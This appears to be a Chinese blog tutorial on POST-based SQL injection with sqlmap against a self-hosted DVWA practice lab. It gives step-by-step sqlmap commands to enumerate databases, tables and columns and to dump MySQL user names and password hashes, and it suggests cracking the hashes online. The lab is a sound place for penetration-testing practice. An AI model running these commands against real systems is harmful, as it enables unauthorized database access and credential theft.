目录

  • 环境工具
  • 攻击步骤
    • 一、获取并保存数据包
    • 二、sqlmap注入攻击
      • 1.获取数据库信息
      • 2.获取MySQL数据库中的表
      • 3.获取user表中的字段
      • 4.获取用户名和密码
  • 总结

环境工具

PS:sqlmap工具安装请查看get注入的bloghttps://blog.csdn.net/qq_45833260/article/details/125657568?spm=1001.2014.3001.5502

使用phpstudy搭建的DVWA靶场-暴力破解(low级别)
sqlmap

攻击步骤

一、获取并保存数据包

  • 选择暴力破解,输入用户名,密码随便输,burpsuite抓包(虽然此处是get请求方式,但不影响后面的攻击,也可以右键改成post方式)
  • 在数据包右键选择copy to file,保存数据包为post.txt

二、sqlmap注入攻击

PS:将post.txt移动到和sqlmap.py同一目录下,或者写入绝对路径

1.获取数据库信息

python sqlmap.py -r post.txt -p username --dbs

注:-r表示加载一个文件,-p指定参数

2.获取MySQL数据库中的表

python sqlmap.py -r post.txt -p username -D mysql --tables

3.获取user表中的字段

python sqlmap.py -r post.txt -p username -D mysql -T user --columns

8.0版本的user表里,没有password字段,取而代之的是authentication_string。所以需要设置密码时,应该操作此字段。

4.获取用户名和密码

python sqlmap.py -r post.txt -p username -D mysql -T user -C “User,authentication_string” --dump

可以看到密码解密为root
也可以用在线的md5对密文进行解密 https://www.cmd5.com/

总结

本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。

DVWA——使用sqlmap工具post注入相关推荐

  1. 自学渗透测试:使用 DVWA 和 SQLmap 探寻 SQL 注入攻击与防范

    数据来源 本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 01 耳熟能详的SQ注入是什么?     关于SQL注入漏洞,维基 ...

  2. sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程

    Sqlmap工具 什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹.访问底层文件系统.执行命令) sql注 ...

  3. 『安全工具』注入神器SQLMAP

    原文: 『安全工具』注入神器SQLMAP Pic by Baidu 0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来.... PS:国内类似软件也有阿D,明小子, ...

  4. 【SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)

    目录 1 前言 2 实验介绍 2.1 实验平台 2.2 实验目标 3 实验过程 3.1 前戏 3.2 判断注入点及注入类型 3.3 爆库名 3.4 爆表名 3.5 爆字段名 3.6 爆字段内容 3.7 ...

  5. 【SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)

    目录 1 前言 2 自动化注入案例-以sqli-labs-less9为例 2.1 实验平台 2.2 注入前准备 2.3 判断注入点及注入类型 2.3.1 自动判断注入点及注入类型 2.3.2 手动判断 ...

  6. 视频教程-SQL注入与SQLmap工具-漏洞挖掘与利用

    SQL注入与SQLmap工具 玄道,从混迹漏洞平台与SRC应急响应中心的白帽子到创业乙方的技术与运营 刘畅 ¥15.00 立即订阅 扫码下载「CSDN程序员学院APP」,1000+技术好课免费看 AP ...

  7. sqlmap工具基本使用(检测sql注入)

    sqlmap的用户手册: sqlmap是python2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中: sqlmap主要用于sql注入方面的异常检测 Mysql数据库 1.先检测是否可 ...

  8. 使用sqlmap检测sql注入漏洞

    一. sql注入概述并安装sqlmap漏洞查看工具 1. sql注入概述 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命 ...

  9. SQLmap工具常用命令

    SQLmap工具常用命令 SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具.它有一个非常棒的特性,即对检测与利用进行自动化处理,如获取数据库指纹.访问底层文件系统.执行命令等等.

最新文章

  1. APUE 学习笔记 - Chapter 6. System Data File and Infomation
  2. 大厂也在用的 6种 数据脱敏方案,别做泄密内鬼
  3. [BZOJ 4800][Ceoi2015]Ice Hockey World Championship(Meet-in-the-Middle)
  4. ubuntu10.10各种服务器搭建
  5. php rpc调用,PHP 通过 JSON-RPC 调用实现以太坊交互
  6. 程序员述职报告范文_物流人员述职报告范文(通用5篇)
  7. docker容器下mongodb 4.0.0 的Replica Sets+Sharded Cluster集群
  8. Wireshark教程(简介、抓包、过滤器)
  9. java中利用正则表达式获取a标签
  10. java快排原理_快速排序 java实现 (原理-优化) 三路快排
  11. 学习Java,真的可以月薪过万嘛?真实个人经历告诉你,记录了平时学习的内容以及学习过程中最真实的感受(三)
  12. 怎样做计算机系统的镜像文件,Windows7 镜像制作过程 图文说明
  13. Linux-设备驱动概述
  14. RTX(2009)整合注意点
  15. Qt 之 HTTP 请求下载(支持断点续传)
  16. linux dropbox自动同步,Linux下DropBox定时同步备份文件
  17. Codeforces Gym100962J:Jimi Hendrix(树型DP)
  18. 计算机文化基础0008 17秋在线作业1,【在线】《计算机文化基础0008》17秋在线作业2.doc...
  19. POS Tagging 和Chunking (学习笔记)
  20. 从零到英雄:资产商店发行人的故事

热门文章

  1. daemon(守护进程)
  2. ROS入门21讲---ROS命令行工具的使用
  3. mac 系统偏好设置中安全选项允许任何来源
  4. ThinkPHP框架漏洞总结
  5. Sublime Text 注册码
  6. robomongo导入数据_robo 3t - 如何使用robomongo从Mongodb导出json
  7. 下载netflix视频linux,Netflix的正版视频可以离线下载到手机上了
  8. 计算机保研要不要刷实习?
  9. Crypto++编译使用
  10. java求两个整数百分比